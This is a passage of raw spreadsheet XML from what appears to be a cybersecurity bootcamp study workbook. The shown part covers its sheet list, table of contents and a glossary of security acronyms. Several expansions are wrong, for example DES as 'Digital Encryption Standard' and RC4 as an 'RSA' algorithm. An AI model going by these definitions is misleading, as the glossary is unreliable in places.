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of Contents" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="Acronyms" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="Educational Resources" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="Tools" sheetId="4" r:id="rId7"/>
    <sheet state="visible" name="TCPUDP Common Ports" sheetId="5" r:id="rId8"/>
    <sheet state="visible" name="Famous Breaches" sheetId="6" r:id="rId9"/>
    <sheet state="visible" name="M1 Cybersecurity 101" sheetId="7" r:id="rId10"/>
    <sheet state="visible" name="M2 Governance Risk and Complian" sheetId="8" r:id="rId11"/>
    <sheet state="visible" name="M3 Terminal and Bash" sheetId="9" r:id="rId12"/>
    <sheet state="visible" name="M4 Linux-SysAdmin-Fundamentals" sheetId="10" r:id="rId13"/>
    <sheet state="visible" name="M5 Archiving and Logging Data" sheetId="11" r:id="rId14"/>
    <sheet state="visible" name="M6 Bash Scripting and Programmi" sheetId="12" r:id="rId15"/>
    <sheet state="visible" name="M7 Windows Administration and H" sheetId="13" r:id="rId16"/>
    <sheet state="visible" name="M8 Networking Fundamentals" sheetId="14" r:id="rId17"/>
    <sheet state="visible" name="M9 Networking Fundamentals II a" sheetId="15" r:id="rId18"/>
    <sheet state="visible" name="M10 Cryptography" sheetId="16" r:id="rId19"/>
    <sheet state="visible" name="M11 Network Security" sheetId="17" r:id="rId20"/>
    <sheet state="visible" name="M12 Web Development" sheetId="18" r:id="rId21"/>
    <sheet state="visible" name="M13 Cloud Computing" sheetId="19" r:id="rId22"/>
    <sheet state="visible" name="M14 Project 1" sheetId="20" r:id="rId23"/>
    <sheet state="visible" name="M15 Web Vulnerabilities and Har" sheetId="21" r:id="rId24"/>
    <sheet state="visible" name="M16 &amp; 17 Pentesting" sheetId="22" r:id="rId25"/>
    <sheet state="visible" name="M19 &amp; 20 SIEM" sheetId="23" r:id="rId26"/>
    <sheet state="visible" name="M21 Digital Forensics" sheetId="24" r:id="rId27"/>
    <sheet state="visible" name="M23 Prep Week  Cert" sheetId="25" r:id="rId28"/>
    <sheet state="visible" name="Vulnerabilities" sheetId="26" r:id="rId29"/>
    <sheet state="visible" name="Attacks and Mitigations" sheetId="27" r:id="rId30"/>
    <sheet state="visible" name="Procedures" sheetId="28" r:id="rId31"/>
    <sheet state="visible" name="Advantages vs Disadvantages" sheetId="29" r:id="rId32"/>
    <sheet state="visible" name="Comparisons" sheetId="30" r:id="rId33"/>
    <sheet state="visible" name="Debian (Linux) Command Base" sheetId="31" r:id="rId34"/>
    <sheet state="visible" name="Kali (Linux) Command Base" sheetId="32" r:id="rId35"/>
    <sheet state="visible" name="Powershell (Windows) Command Ba" sheetId="33" r:id="rId36"/>
    <sheet state="visible" name="Wireshark Command Base" sheetId="34" r:id="rId37"/>
    <sheet state="visible" name="Splunk Command Base" sheetId="35" r:id="rId38"/>
    <sheet state="visible" name="Metasploit Command Base" sheetId="36" r:id="rId39"/>
    <sheet state="visible" name="Meterpreter Command Base" sheetId="37" r:id="rId40"/>
    <sheet state="visible" name="Python Command Base" sheetId="38" r:id="rId41"/>
    <sheet state="visible" name="SQL Command Base" sheetId="39" r:id="rId42"/>
    <sheet state="visible" name="XSS Command Base" sheetId="40" r:id="rId43"/>
    <sheet state="visible" name="Google Dork Command Base" sheetId="41" r:id="rId44"/>
    <sheet state="visible" name="Copy of Google Dork Command Bas" sheetId="42" r:id="rId45"/>
    <sheet state="visible" name="TryHackMe Definitions" sheetId="43" r:id="rId46"/>
    <sheet state="visible" name="ISC2 - CC" sheetId="44" r:id="rId47"/>
  </sheets>
  <definedNames>
    <definedName hidden="1" localSheetId="1" name="_xlnm._FilterDatabase">Acronyms!$A$1:$B$234</definedName>
    <definedName hidden="1" localSheetId="2" name="_xlnm._FilterDatabase">'Educational Resources'!$A$1:$C$210</definedName>
    <definedName hidden="1" localSheetId="3" name="_xlnm._FilterDatabase">Tools!$A$1:$E$209</definedName>
    <definedName hidden="1" localSheetId="4" name="_xlnm._FilterDatabase">'TCPUDP Common Ports'!$A$1:$D$234</definedName>
    <definedName hidden="1" localSheetId="5" name="_xlnm._FilterDatabase">'Famous Breaches'!$A$1:$E$210</definedName>
    <definedName hidden="1" localSheetId="6" name="_xlnm._FilterDatabase">'M1 Cybersecurity 101'!$A$1:$C$34</definedName>
    <definedName hidden="1" localSheetId="7" name="_xlnm._FilterDatabase">'M2 Governance Risk and Complian'!$A$1:$C$59</definedName>
    <definedName hidden="1" localSheetId="8" name="_xlnm._FilterDatabase">'M3 Terminal and Bash'!$A$1:$C$25</definedName>
    <definedName hidden="1" localSheetId="9" name="_xlnm._FilterDatabase">'M4 Linux-SysAdmin-Fundamentals'!$A$1:$C$53</definedName>
    <definedName hidden="1" localSheetId="10" name="_xlnm._FilterDatabase">'M5 Archiving and Logging Data'!$A$1:$C$40</definedName>
    <definedName hidden="1" localSheetId="11" name="_xlnm._FilterDatabase">'M6 Bash Scripting and Programmi'!$A$1:$C$12</definedName>
    <definedName hidden="1" localSheetId="12" name="_xlnm._FilterDatabase">'M7 Windows Administration and H'!$A$1:$C$37</definedName>
    <definedName hidden="1" localSheetId="13" name="_xlnm._FilterDatabase">'M8 Networking Fundamentals'!$A$1:$C$95</definedName>
    <definedName hidden="1" localSheetId="14" name="_xlnm._FilterDatabase">'M9 Networking Fundamentals II a'!$A$1:$C$66</definedName>
    <definedName hidden="1" localSheetId="15" name="_xlnm._FilterDatabase">'M10 Cryptography'!$A$1:$C$76</definedName>
    <definedName hidden="1" localSheetId="16" name="_xlnm._FilterDatabase">'M11 Network Security'!$A$1:$C$72</definedName>
    <definedName hidden="1" localSheetId="17" name="_xlnm._FilterDatabase">'M12 Web Development'!$A$1:$C$73</definedName>
    <definedName hidden="1" localSheetId="18" name="_xlnm._FilterDatabase">'M13 Cloud Computing'!$A$1:$C$50</definedName>
    <definedName hidden="1" localSheetId="19" name="_xlnm._FilterDatabase">'M14 Project 1'!$A$1:$C$10</definedName>
    <definedName hidden="1" localSheetId="20" name="_xlnm._FilterDatabase">'M15 Web Vulnerabilities and Har'!$A$1:$C$47</definedName>
    <definedName hidden="1" localSheetId="21" name="_xlnm._FilterDatabase">'M16 &amp; 17 Pentesting'!$A$1:$C$129</definedName>
    <definedName hidden="1" localSheetId="22" name="_xlnm._FilterDatabase">'M19 &amp; 20 SIEM'!$A$1:$C$51</definedName>
    <definedName hidden="1" localSheetId="23" name="_xlnm._FilterDatabase">'M21 Digital Forensics'!$A$1:$C$41</definedName>
    <definedName hidden="1" localSheetId="24" name="_xlnm._FilterDatabase">'M23 Prep Week  Cert'!$A$1:$C$130</definedName>
    <definedName hidden="1" localSheetId="25" name="_xlnm._FilterDatabase">Vulnerabilities!$A$1:$C$53</definedName>
    <definedName hidden="1" localSheetId="26" name="_xlnm._FilterDatabase">'Attacks and Mitigations'!$A$1:$C$55</definedName>
    <definedName hidden="1" localSheetId="30" name="_xlnm._FilterDatabase">'Debian (Linux) Command Base'!$A$1:$D$299</definedName>
    <definedName hidden="1" localSheetId="31" name="_xlnm._FilterDatabase">'Kali (Linux) Command Base'!$A$1:$D$294</definedName>
    <definedName hidden="1" localSheetId="32" name="_xlnm._FilterDatabase">'Powershell (Windows) Command Ba'!$A$1:$D$207</definedName>
    <definedName hidden="1" localSheetId="33" name="_xlnm._FilterDatabase">'Wireshark Command Base'!$A$1:$D$207</definedName>
    <definedName hidden="1" localSheetId="34" name="_xlnm._FilterDatabase">'Splunk Command Base'!$A$1:$D$207</definedName>
    <definedName hidden="1" localSheetId="35" name="_xlnm._FilterDatabase">'Metasploit Command Base'!$A$1:$D$208</definedName>
    <definedName hidden="1" localSheetId="36" name="_xlnm._FilterDatabase">'Meterpreter Command Base'!$A$1:$D$208</definedName>
    <definedName hidden="1" localSheetId="37" name="_xlnm._FilterDatabase">'Python Command Base'!$A$1:$D$207</definedName>
    <definedName hidden="1" localSheetId="38" name="_xlnm._FilterDatabase">'SQL Command Base'!$A$1:$D$293</definedName>
    <definedName hidden="1" localSheetId="39" name="_xlnm._FilterDatabase">'XSS Command Base'!$A$1:$D$293</definedName>
    <definedName hidden="1" localSheetId="40" name="_xlnm._FilterDatabase">'Google Dork Command Base'!$A$1:$D$290</definedName>
    <definedName hidden="1" localSheetId="41" name="_xlnm._FilterDatabase">'Copy of Google Dork Command Bas'!$A$1:$D$290</definedName>
    <definedName hidden="1" localSheetId="42" name="_xlnm._FilterDatabase">'TryHackMe Definitions'!$A$1:$D$115</definedName>
    <definedName hidden="1" localSheetId="43" name="_xlnm._FilterDatabase">'ISC2 - CC'!$A$1:$D$149</definedName>
  </definedNames>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="7668" uniqueCount="5346">
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color rgb="FFFFFFFF"/>
        <sz val="19.0"/>
      </rPr>
      <t xml:space="preserve">Table of Contents </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color rgb="FFFFFFFF"/>
        <sz val="8.0"/>
      </rPr>
      <t>(Use the             icon in the SheetsPanel to navigate)</t>
    </r>
  </si>
  <si>
    <t>Additional Content</t>
  </si>
  <si>
    <t>Acronyms</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>Educational Resources</t>
  </si>
  <si>
    <t>Procedures</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Attacks &amp; Mitigations</t>
  </si>
  <si>
    <t>TCP/UDP Common Ports</t>
  </si>
  <si>
    <t>Advantages vs Disadvantages</t>
  </si>
  <si>
    <t>Famous Breaches</t>
  </si>
  <si>
    <t>Comparisons</t>
  </si>
  <si>
    <t>Modules</t>
  </si>
  <si>
    <t>Command Base</t>
  </si>
  <si>
    <t>Module 1: Cybersecurity 101</t>
  </si>
  <si>
    <t>Bash (Linux) Command Base</t>
  </si>
  <si>
    <t>Module 2: Governance Risk and Compliance</t>
  </si>
  <si>
    <t>Kali (Linux) Command Base</t>
  </si>
  <si>
    <t>Module 3: Terminal and Bash</t>
  </si>
  <si>
    <t>PowerShell (Windows) Command Base</t>
  </si>
  <si>
    <t>Module 4: Linux-SysAdmin-Fundamentals</t>
  </si>
  <si>
    <t>Python Command Base</t>
  </si>
  <si>
    <t>Module 5: Archiving and Logging Data</t>
  </si>
  <si>
    <t>Wireshark Command Base</t>
  </si>
  <si>
    <t>Module 6: Bash Scripting and Programming</t>
  </si>
  <si>
    <t>Metasploit Command Base</t>
  </si>
  <si>
    <t>Module 7: Windows Administration and Hardening</t>
  </si>
  <si>
    <t>SQL Command Base</t>
  </si>
  <si>
    <t>Module 8: Networking Fundamentals</t>
  </si>
  <si>
    <t>XSS Command Base</t>
  </si>
  <si>
    <t>Module 9: Networking Fundamentals II and CTF</t>
  </si>
  <si>
    <t>Google Dorks Command Base</t>
  </si>
  <si>
    <t>Module 10: Cryptography</t>
  </si>
  <si>
    <t>Module 11: Network Security</t>
  </si>
  <si>
    <t>Module 12: Web Development</t>
  </si>
  <si>
    <t>Module 13: Cloud Computing</t>
  </si>
  <si>
    <t>Miscellaneuos</t>
  </si>
  <si>
    <t>Module 14: Project 1</t>
  </si>
  <si>
    <t>TryHackMe Definitions</t>
  </si>
  <si>
    <t>Module 15: Web Vulnerabilities and Hardening</t>
  </si>
  <si>
    <t>ISC - CC</t>
  </si>
  <si>
    <t>Module 16 &amp; 17: Pentesting</t>
  </si>
  <si>
    <t xml:space="preserve">Module 19 &amp; 20: SIEM </t>
  </si>
  <si>
    <t>Module 21: Digital Forensics</t>
  </si>
  <si>
    <t>Module 23: Prep Week / Certs</t>
  </si>
  <si>
    <t>Aconyms</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>3DES</t>
  </si>
  <si>
    <t>Triple Digital Encryption Standard</t>
  </si>
  <si>
    <t>AAA</t>
  </si>
  <si>
    <t>Authentication, Authorization, and Accounting</t>
  </si>
  <si>
    <t>ACL</t>
  </si>
  <si>
    <t>Access Control List</t>
  </si>
  <si>
    <t>AES</t>
  </si>
  <si>
    <t>Advanced Encryption Standard</t>
  </si>
  <si>
    <t>AES256</t>
  </si>
  <si>
    <t>Advanced Encryption Standards 256bit</t>
  </si>
  <si>
    <t>AH</t>
  </si>
  <si>
    <t>Authentication Header</t>
  </si>
  <si>
    <t>ALE</t>
  </si>
  <si>
    <t>Annualized Loss Expectancy</t>
  </si>
  <si>
    <t>AP</t>
  </si>
  <si>
    <t>Access Point</t>
  </si>
  <si>
    <t>API</t>
  </si>
  <si>
    <t>Application Programming Interface</t>
  </si>
  <si>
    <t>APT</t>
  </si>
  <si>
    <t>Advanced Persistent Threat</t>
  </si>
  <si>
    <t>ASP</t>
  </si>
  <si>
    <t>Application Service Provider</t>
  </si>
  <si>
    <t>ARO</t>
  </si>
  <si>
    <t>Annualized Rate of Occurrence</t>
  </si>
  <si>
    <t>ARP</t>
  </si>
  <si>
    <t>Address Resolution Protocol</t>
  </si>
  <si>
    <t>AUP</t>
  </si>
  <si>
    <t>Acceptable Use Policy</t>
  </si>
  <si>
    <t>BAC</t>
  </si>
  <si>
    <t>Business Availability Center</t>
  </si>
  <si>
    <t>BCP</t>
  </si>
  <si>
    <t>Business Continuity Planning</t>
  </si>
  <si>
    <t>BIA</t>
  </si>
  <si>
    <t>Business Impact Analysis</t>
  </si>
  <si>
    <t>BIOS</t>
  </si>
  <si>
    <t>Basic Input / Output System</t>
  </si>
  <si>
    <t>BPA</t>
  </si>
  <si>
    <t>Business Partners Agreement</t>
  </si>
  <si>
    <t>BYOD</t>
  </si>
  <si>
    <t>Bring Your Own Device</t>
  </si>
  <si>
    <t>CA</t>
  </si>
  <si>
    <t>Certificate Authority</t>
  </si>
  <si>
    <t>CAC</t>
  </si>
  <si>
    <t>Common Access Card</t>
  </si>
  <si>
    <t>CAN</t>
  </si>
  <si>
    <t>Controller Area Network</t>
  </si>
  <si>
    <t>CAPTCHA</t>
  </si>
  <si>
    <t>Completely Automated Public Turing Test to Tell Computers and Humans Apart</t>
  </si>
  <si>
    <t>CAR</t>
  </si>
  <si>
    <t>Corrective Action Report</t>
  </si>
  <si>
    <t>CCMP</t>
  </si>
  <si>
    <t>Counter Mode/CBC Mac Protocol</t>
  </si>
  <si>
    <t>CCTV</t>
  </si>
  <si>
    <t>Closed circuit television</t>
  </si>
  <si>
    <t>CERT</t>
  </si>
  <si>
    <t>Computer Emergency Response Team</t>
  </si>
  <si>
    <t>CHAP</t>
  </si>
  <si>
    <t>Challenge Handshake Authentication Protocol</t>
  </si>
  <si>
    <t>CIO</t>
  </si>
  <si>
    <t>Chief Information Officer</t>
  </si>
  <si>
    <t>CIRT</t>
  </si>
  <si>
    <t>Computer Incident Response Team</t>
  </si>
  <si>
    <t>COOP</t>
  </si>
  <si>
    <t>Continuity of Operation Planning</t>
  </si>
  <si>
    <t>CP</t>
  </si>
  <si>
    <t>Contingency Planning</t>
  </si>
  <si>
    <t>CRC</t>
  </si>
  <si>
    <t>Cyclical Redundancy Check</t>
  </si>
  <si>
    <t>CRL</t>
  </si>
  <si>
    <t>Certification Revocation List</t>
  </si>
  <si>
    <t>CSR</t>
  </si>
  <si>
    <t>Control Status Register</t>
  </si>
  <si>
    <t>CSU</t>
  </si>
  <si>
    <t>Channel Service Unit</t>
  </si>
  <si>
    <t>CTO</t>
  </si>
  <si>
    <t>Chief Technology Officer</t>
  </si>
  <si>
    <t>DAC</t>
  </si>
  <si>
    <t>Discretionary Access Control</t>
  </si>
  <si>
    <t>DBA</t>
  </si>
  <si>
    <t>Database Administrator</t>
  </si>
  <si>
    <t>DDOS</t>
  </si>
  <si>
    <t>Distributed Denial of Service</t>
  </si>
  <si>
    <t>DEP</t>
  </si>
  <si>
    <t>Data Execution Prevention</t>
  </si>
  <si>
    <t>DES</t>
  </si>
  <si>
    <t>Digital Encryption Standard</t>
  </si>
  <si>
    <t>DHCP</t>
  </si>
  <si>
    <t>Dynamic Host Configuration Protocol</t>
  </si>
  <si>
    <t>DHE</t>
  </si>
  <si>
    <t>Data Handling Electronics</t>
  </si>
  <si>
    <t>Diffie-Hellman Ephemeral</t>
  </si>
  <si>
    <t>DLL</t>
  </si>
  <si>
    <t>Dynamic Link Library</t>
  </si>
  <si>
    <t>DLP</t>
  </si>
  <si>
    <t>Data Loss Prevention</t>
  </si>
  <si>
    <t>DMZ</t>
  </si>
  <si>
    <t>Demilitarized Zone</t>
  </si>
  <si>
    <t>DNAT</t>
  </si>
  <si>
    <t>Destination Network Address Transaction</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>Domain Name Service (Server)</t>
  </si>
  <si>
    <t>DOS</t>
  </si>
  <si>
    <t>Denial of Service</t>
  </si>
  <si>
    <t>DRP</t>
  </si>
  <si>
    <t>Disaster Recovery Plan</t>
  </si>
  <si>
    <t>DSA</t>
  </si>
  <si>
    <t>Digital Signature Algorithm</t>
  </si>
  <si>
    <t>DSL</t>
  </si>
  <si>
    <t>Digital Subscriber line</t>
  </si>
  <si>
    <t>DSU</t>
  </si>
  <si>
    <t>Data Service Unit</t>
  </si>
  <si>
    <t>EAP</t>
  </si>
  <si>
    <t>Extensible Authentication Protocol</t>
  </si>
  <si>
    <t>ECC</t>
  </si>
  <si>
    <t>Elliptic Curve Cryptography</t>
  </si>
  <si>
    <t>ECDHE</t>
  </si>
  <si>
    <t>Elliptic Curve Diffie-Hellman Ephemeral</t>
  </si>
  <si>
    <t>EFS</t>
  </si>
  <si>
    <t>Encrypted File System</t>
  </si>
  <si>
    <t>EMI</t>
  </si>
  <si>
    <t>Electromagnetic Interference</t>
  </si>
  <si>
    <t>ESN</t>
  </si>
  <si>
    <t>Electronic Serial Number</t>
  </si>
  <si>
    <t>ESP</t>
  </si>
  <si>
    <t>Encapsulated Security Payload</t>
  </si>
  <si>
    <t>FACL</t>
  </si>
  <si>
    <t>File System Access Control List</t>
  </si>
  <si>
    <t>FDE</t>
  </si>
  <si>
    <t>Full Disk Encryption</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>File Transfer Protocol</t>
  </si>
  <si>
    <t>FTPS</t>
  </si>
  <si>
    <t>Secured File Transfer Protocol</t>
  </si>
  <si>
    <t>GPG</t>
  </si>
  <si>
    <t>Gnu Privacy Guard</t>
  </si>
  <si>
    <t>GPO</t>
  </si>
  <si>
    <t>Group Policy Object</t>
  </si>
  <si>
    <t>GPS</t>
  </si>
  <si>
    <t>Global Positioning System</t>
  </si>
  <si>
    <t>GPU</t>
  </si>
  <si>
    <t>Graphic Processing Unit</t>
  </si>
  <si>
    <t>GRE</t>
  </si>
  <si>
    <t>Generic Routing Encapsulation</t>
  </si>
  <si>
    <t>HDD</t>
  </si>
  <si>
    <t>Hard Disk Drive</t>
  </si>
  <si>
    <t>HIDS</t>
  </si>
  <si>
    <t>Host Based Intrusion Detection System</t>
  </si>
  <si>
    <t>HIPS</t>
  </si>
  <si>
    <t>Host Based Intrusion Prevention System</t>
  </si>
  <si>
    <t>HMAC</t>
  </si>
  <si>
    <t>Hashed Message Authentication Code</t>
  </si>
  <si>
    <t>HOTP</t>
  </si>
  <si>
    <t>HMAC based One Time Password</t>
  </si>
  <si>
    <t>HSM</t>
  </si>
  <si>
    <t>Hardware Security Module</t>
  </si>
  <si>
    <t>HTML</t>
  </si>
  <si>
    <t>HyperText Markup Language</t>
  </si>
  <si>
    <t>HTTP</t>
  </si>
  <si>
    <t>Hypertext Transfer Protocol</t>
  </si>
  <si>
    <t>HTTPS</t>
  </si>
  <si>
    <t>Hypertext Transfer Protocol over SSL</t>
  </si>
  <si>
    <t>HVAC</t>
  </si>
  <si>
    <t>Heating, Ventilation Air Conditioning</t>
  </si>
  <si>
    <t>IaaS</t>
  </si>
  <si>
    <t>Infrastructure as a Service</t>
  </si>
  <si>
    <t>ICMP</t>
  </si>
  <si>
    <t>Internet Control Message Protocol</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Identification</t>
  </si>
  <si>
    <t>IDS</t>
  </si>
  <si>
    <t>Intrusion Detection System</t>
  </si>
  <si>
    <t>IKE</t>
  </si>
  <si>
    <t>Internet Key Exchange</t>
  </si>
  <si>
    <t>IM</t>
  </si>
  <si>
    <t>Instant messaging</t>
  </si>
  <si>
    <t>IMAP4</t>
  </si>
  <si>
    <t>Internet Message Access Protocol v4</t>
  </si>
  <si>
    <t>IP</t>
  </si>
  <si>
    <t>Internet Protocol</t>
  </si>
  <si>
    <t>IPSEC</t>
  </si>
  <si>
    <t>Internet Protocol Security</t>
  </si>
  <si>
    <t>IR</t>
  </si>
  <si>
    <t>Incident Response</t>
  </si>
  <si>
    <t>IRC</t>
  </si>
  <si>
    <t>Internet Relay Chat</t>
  </si>
  <si>
    <t>IRP</t>
  </si>
  <si>
    <t>Incident Response Procedure</t>
  </si>
  <si>
    <t>ISA</t>
  </si>
  <si>
    <t>Interconnection Security Agreement</t>
  </si>
  <si>
    <t>ISP</t>
  </si>
  <si>
    <t>Internet Service Provider</t>
  </si>
  <si>
    <t>ISSO</t>
  </si>
  <si>
    <t>Information Systems Security Officer</t>
  </si>
  <si>
    <t>ITCP</t>
  </si>
  <si>
    <t>IT Contingency Plan</t>
  </si>
  <si>
    <t>IV</t>
  </si>
  <si>
    <t>Initialization Vector</t>
  </si>
  <si>
    <t>JBOD</t>
  </si>
  <si>
    <t>Just a Bunch of Disks</t>
  </si>
  <si>
    <t>KDC</t>
  </si>
  <si>
    <t>Key Distribution Center</t>
  </si>
  <si>
    <t>L2TP</t>
  </si>
  <si>
    <t>Layer 2 Tunneling Protocol</t>
  </si>
  <si>
    <t>LAN</t>
  </si>
  <si>
    <t>Local Area Network</t>
  </si>
  <si>
    <t>LDAP</t>
  </si>
  <si>
    <t>Lightweight Directory Access Protocol</t>
  </si>
  <si>
    <t>LEAP</t>
  </si>
  <si>
    <t>Lightweight Extensible Authentication Protocol</t>
  </si>
  <si>
    <t>MaaS</t>
  </si>
  <si>
    <t>Monitoring as a Service</t>
  </si>
  <si>
    <t>MAC</t>
  </si>
  <si>
    <t>Mandatory Access Control / Media Access Control</t>
  </si>
  <si>
    <t>Message Authentication Code</t>
  </si>
  <si>
    <t>MAN</t>
  </si>
  <si>
    <t>Metropolitan Area Network</t>
  </si>
  <si>
    <t>MBR</t>
  </si>
  <si>
    <t>Master Boot Record</t>
  </si>
  <si>
    <t>MD5</t>
  </si>
  <si>
    <t>Message Digest 5</t>
  </si>
  <si>
    <t>MOU</t>
  </si>
  <si>
    <t>Memorandum of Understanding</t>
  </si>
  <si>
    <t>MPLS</t>
  </si>
  <si>
    <t>Multi-Protocol Layer Switch</t>
  </si>
  <si>
    <t>MSCHAP</t>
  </si>
  <si>
    <t>Microsoft Challenge Handshake Authentication</t>
  </si>
  <si>
    <t>MTBF</t>
  </si>
  <si>
    <t>Mean Time Between Failures</t>
  </si>
  <si>
    <t>MTTR</t>
  </si>
  <si>
    <t>Mean Time to Recover</t>
  </si>
  <si>
    <t>MTTF</t>
  </si>
  <si>
    <t>Mean Time to Failure</t>
  </si>
  <si>
    <t>MTU</t>
  </si>
  <si>
    <t>Maximum Transmission Unit</t>
  </si>
  <si>
    <t>NAC</t>
  </si>
  <si>
    <t>Network Access Control</t>
  </si>
  <si>
    <t>NAT</t>
  </si>
  <si>
    <t>Network Address Translation</t>
  </si>
  <si>
    <t>NDA</t>
  </si>
  <si>
    <t>Non- Disclosure Agreement</t>
  </si>
  <si>
    <t>NFC</t>
  </si>
  <si>
    <t>Near Field Communication</t>
  </si>
  <si>
    <t>NIDS</t>
  </si>
  <si>
    <t>Network Based Intrusion Detection System</t>
  </si>
  <si>
    <t>NIPS</t>
  </si>
  <si>
    <t>Network Based Intrusion Prevention System</t>
  </si>
  <si>
    <t>NIST</t>
  </si>
  <si>
    <t>National Institute of Standards &amp; Technology</t>
  </si>
  <si>
    <t>NOS</t>
  </si>
  <si>
    <t>Network Operating System</t>
  </si>
  <si>
    <t>NTFS</t>
  </si>
  <si>
    <t>New Technology File System</t>
  </si>
  <si>
    <t>NTLM</t>
  </si>
  <si>
    <t>New Technology LANMAN</t>
  </si>
  <si>
    <t>NTP</t>
  </si>
  <si>
    <t>Network Time Protocol</t>
  </si>
  <si>
    <t>OCSP</t>
  </si>
  <si>
    <t>Online Certificate Status Protocol</t>
  </si>
  <si>
    <t>OLA</t>
  </si>
  <si>
    <t>Open License Agreement</t>
  </si>
  <si>
    <t>OS</t>
  </si>
  <si>
    <t>Operating System</t>
  </si>
  <si>
    <t>OVAL</t>
  </si>
  <si>
    <t>Open Vulnerability Assessment Language</t>
  </si>
  <si>
    <t>OWASP</t>
  </si>
  <si>
    <t>Open Web Application Security Project</t>
  </si>
  <si>
    <t>P2P</t>
  </si>
  <si>
    <t>Peer to Peer</t>
  </si>
  <si>
    <t>PAC</t>
  </si>
  <si>
    <t>Proxy Auto Configuration</t>
  </si>
  <si>
    <t>PAM</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>PAP</t>
  </si>
  <si>
    <t>Password Authentication Protocol</t>
  </si>
  <si>
    <t>PAT</t>
  </si>
  <si>
    <t>Port Address Translation</t>
  </si>
  <si>
    <t>PASTA</t>
  </si>
  <si>
    <t>Process for Attack Simulation and Threat Analysis</t>
  </si>
  <si>
    <t>PBKDF2</t>
  </si>
  <si>
    <t>Password Based Key Derivation Function 2</t>
  </si>
  <si>
    <t>PBX</t>
  </si>
  <si>
    <t>Private Branch Exchange</t>
  </si>
  <si>
    <t>PCAP</t>
  </si>
  <si>
    <t>Packet Capture</t>
  </si>
  <si>
    <t>PEAP</t>
  </si>
  <si>
    <t>Protected Extensible Authentication Protocol</t>
  </si>
  <si>
    <t>PED</t>
  </si>
  <si>
    <t>Personal Electronic Device</t>
  </si>
  <si>
    <t>PGP</t>
  </si>
  <si>
    <t>Pretty Good Privacy</t>
  </si>
  <si>
    <t>PII</t>
  </si>
  <si>
    <t>Personally Identifiable Information</t>
  </si>
  <si>
    <t>PIV</t>
  </si>
  <si>
    <t>Personal Identity Verification</t>
  </si>
  <si>
    <t>PKI</t>
  </si>
  <si>
    <t>Public Key Infrastructure</t>
  </si>
  <si>
    <t>POTS</t>
  </si>
  <si>
    <t>Plain Old Telephone Service</t>
  </si>
  <si>
    <t>PPP</t>
  </si>
  <si>
    <t>Point to Point Protocol</t>
  </si>
  <si>
    <t>PPTP</t>
  </si>
  <si>
    <t>Point to Point Tunneling Protocol</t>
  </si>
  <si>
    <t>PSK</t>
  </si>
  <si>
    <t>Pre-Shared Key</t>
  </si>
  <si>
    <t>PTZ</t>
  </si>
  <si>
    <t>Pan-Tilt-Zoom</t>
  </si>
  <si>
    <t>RA</t>
  </si>
  <si>
    <t>Recovery Agent</t>
  </si>
  <si>
    <t>RAD</t>
  </si>
  <si>
    <t>Rapid application development</t>
  </si>
  <si>
    <t>RADIUS</t>
  </si>
  <si>
    <t>Remote Authentication Dial-In user Service</t>
  </si>
  <si>
    <t>RAID</t>
  </si>
  <si>
    <t>Redundant Array of Inexpensive Disks</t>
  </si>
  <si>
    <t>RAS</t>
  </si>
  <si>
    <t>Remote Access Server</t>
  </si>
  <si>
    <t>RBAC</t>
  </si>
  <si>
    <t>Role Based Access Control</t>
  </si>
  <si>
    <t>Rule Based Access Control</t>
  </si>
  <si>
    <t>RC4</t>
  </si>
  <si>
    <t>RSA Variable Key Size Encryption Algorithm</t>
  </si>
  <si>
    <t>RIPEMD</t>
  </si>
  <si>
    <t>RACE Integrity Primitives Evaluation Message Digest</t>
  </si>
  <si>
    <t>ROI</t>
  </si>
  <si>
    <t>Return of Investment</t>
  </si>
  <si>
    <t>RPO</t>
  </si>
  <si>
    <t>Recovery Point Objective</t>
  </si>
  <si>
    <t>RSA</t>
  </si>
  <si>
    <t>Rivest, Shamir, &amp; Adleman</t>
  </si>
  <si>
    <t>RTO</t>
  </si>
  <si>
    <t>Recovery Time Objective</t>
  </si>
  <si>
    <t>RTP</t>
  </si>
  <si>
    <t>Real Time Transport Protocol</t>
  </si>
  <si>
    <t>S/MIME</t>
  </si>
  <si>
    <t>Secure / Multipurpose Internet Mail Extensions</t>
  </si>
  <si>
    <t>SAML</t>
  </si>
  <si>
    <t>Security Assertions Markup Language</t>
  </si>
  <si>
    <t>SaaS</t>
  </si>
  <si>
    <t>Software as a Service</t>
  </si>
  <si>
    <t>SAN</t>
  </si>
  <si>
    <t>Storage Area Network</t>
  </si>
  <si>
    <t>SCADA</t>
  </si>
  <si>
    <t>System Control and Data Acquisition</t>
  </si>
  <si>
    <t>SCAP</t>
  </si>
  <si>
    <t>Security Content Automation Protocol</t>
  </si>
  <si>
    <t>SCEP</t>
  </si>
  <si>
    <t>Simple Certificate Enrollment Protocol</t>
  </si>
  <si>
    <t>SCSI</t>
  </si>
  <si>
    <t>Small Computer System Interface</t>
  </si>
  <si>
    <t>SDLC</t>
  </si>
  <si>
    <t>Software Development Life Cycle</t>
  </si>
  <si>
    <t>SDLM</t>
  </si>
  <si>
    <t>Software Development Life Cycle Methodology</t>
  </si>
  <si>
    <t>SEH</t>
  </si>
  <si>
    <t>Structured Exception Handler</t>
  </si>
  <si>
    <t>SHA</t>
  </si>
  <si>
    <t>Secure Hashing Algorithm</t>
  </si>
  <si>
    <t>SFTP</t>
  </si>
  <si>
    <t>SHTTP</t>
  </si>
  <si>
    <t>Secure Hypertext Transfer Protocol</t>
  </si>
  <si>
    <t>SIEM</t>
  </si>
  <si>
    <t>Security Information and Event Management</t>
  </si>
  <si>
    <t>SIM</t>
  </si>
  <si>
